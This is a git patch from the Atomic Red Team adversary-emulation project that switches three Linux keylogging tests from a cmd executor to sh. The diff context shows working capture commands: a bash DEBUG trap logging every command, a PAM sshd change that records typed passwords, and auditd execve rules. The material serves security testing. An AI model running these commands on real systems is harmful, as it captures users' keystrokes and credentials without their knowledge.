From 3c80fa064ef3bcdbd7a52ae159a237800d3878e9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 20 Sep 2021 18:48:06 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 12 ++++++------ atomics/Indexes/Indexes-CSV/linux-index.csv | 12 ++++++------ atomics/Indexes/index.yaml | 12 ++++++------ atomics/T1056.001/T1056.001.md | 18 +++++++++--------- 4 files changed, 27 insertions(+), 27 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 73189ebd..0a126db4 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -37,9 +37,9 @@ credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f1250758 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh -credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt -credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt -credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt +credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh +credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh +credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt @@ -121,9 +121,9 @@ collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2 collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh -collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt -collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt -collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt +collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh +collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh +collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index be11958c..3f886051 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -9,9 +9,9 @@ credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,b credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh -credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt -credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt -credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt +credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh +credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh +credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell @@ -34,9 +34,9 @@ collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh -collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt -collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt -collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt +collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh +collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh +collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 90337d18..71f7dccc 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -2853,7 +2853,7 @@ credential-access: type: String default: "/tmp/.keyboard.log" executor: - name: command_prompt + name: sh elevation_required: false command: | trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG @@ -2889,7 +2889,7 @@ credential-access: type: String default: ubuntu executor: - name: command_prompt + name: sh elevation_required: true command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl @@ -2917,7 +2917,7 @@ credential-access: ' executor: - name: command_prompt + name: sh elevation_required: true command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start @@ -8762,7 +8762,7 @@ collection: type: String default: "/tmp/.keyboard.log" executor: - name: command_prompt + name: sh elevation_required: false command: | trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG @@ -8798,7 +8798,7 @@ collection: type: String default: ubuntu executor: - name: command_prompt + name: sh elevation_required: true command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl @@ -8826,7 +8826,7 @@ collection: ' executor: - name: command_prompt + name: sh elevation_required: true command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index dc6c9441..cba8f1d1 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -188,17 +188,17 @@ To gain persistence the command could be added to the users .bashrc or .bash_ali | output_file | File to store captured commands | String | /tmp/.keyboard.log| -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `sh`! -```cmd +```sh trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG echo "Hello World!" cat #{output_file} ``` #### Cleanup Commands: -```cmd +```sh rm #{output_file} ``` @@ -239,10 +239,10 @@ Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The | user_account | Basic ssh user account for testing. | String | ubuntu| -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) -```cmd +```sh cp -v /etc/pam.d/sshd /tmp/ echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" systemctl restart sshd @@ -256,7 +256,7 @@ exit ``` #### Cleanup Commands: -```cmd +```sh cp -fv /tmp/sshd /etc/pam.d/ ``` @@ -293,17 +293,17 @@ The linux audit tool auditd can be used to capture 32 and 64 bit command executi -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) -```cmd +```sh auditctl -a always,exit -F arch=b64 -S execve -k CMDS auditctl -a always,exit -F arch=b32 -S execve -k CMDS whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") ``` #### Cleanup Commands: -```cmd +```sh systemctl restart auditd ```